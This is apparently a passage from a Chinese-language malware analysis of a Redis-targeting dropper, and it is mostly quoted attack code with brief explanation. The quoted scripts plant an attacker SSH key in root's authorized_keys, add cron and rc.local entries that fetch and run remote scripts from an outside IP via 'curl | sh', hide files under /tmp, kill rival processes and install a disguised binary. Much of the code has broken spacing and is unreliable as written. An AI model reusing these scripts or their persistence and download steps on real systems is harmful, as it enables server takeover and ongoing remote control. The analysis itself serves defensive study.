mkdir -p /var/spool/cron/crontabs 2>/dev/ null
mkdir -p /root/.ssh 2>/dev/ null
echo 'ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx
redisX'> /root/.ssh/authorized_keys
echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh'> /var/spool/cron/root
echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh'> /var/spool/cron/crontabs/root
yum install -y bash 2>/dev/ null
apt install -y bash 2>/dev/ null
apt-get install -y bash 2>/dev/ null
bash -c 'curl -fsSL 159.89.190.243/bsh.php|bash'2>/dev/ null
大致分析一下该脚本的主要用途:首先是关闭 SELinux,解除 Shell 资源访问限制,然后在 /root/.ssh/authorized_keys 文件中生成 SSH 公钥。
这样每次黑客登录这台服务器就可以免密码登录了,执行脚本就会方便很多。
接下来安装 Bash,最后是继续下载第二个脚本 bsh.php,并且执行。继续下载并分析 bsh.pbp,内容如下:
sleep $( seq 3 7 | sort -R | head -n1 )
cd/tmp || cd/var/tmp
sleep 1
mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd.ICE-unix/...
sleep 1
if[ -f .watch ]; then
rm -rf .watch
exit0
fi
sleep 1
echo1 > .watch
sleep 1
ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}'| xargs kill-9 2>/dev/null
ps x | awk '!/awk/ && /barad_agent|masscan|.sr0|clay|udevs|.sshd|xig/ {print $1}'| xargs kill-9 2>/dev/null
sleep 1
if! [ -x /usr/bin/gpg-agentd ]; then
curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db
echo'/usr/bin/gpg-agentd'> /etc/rc.local
echo'curl -fsSL 159.89.190.243/ash.php|sh'>> /etc/rc.local
echo'exit 0'>> /etc/rc.local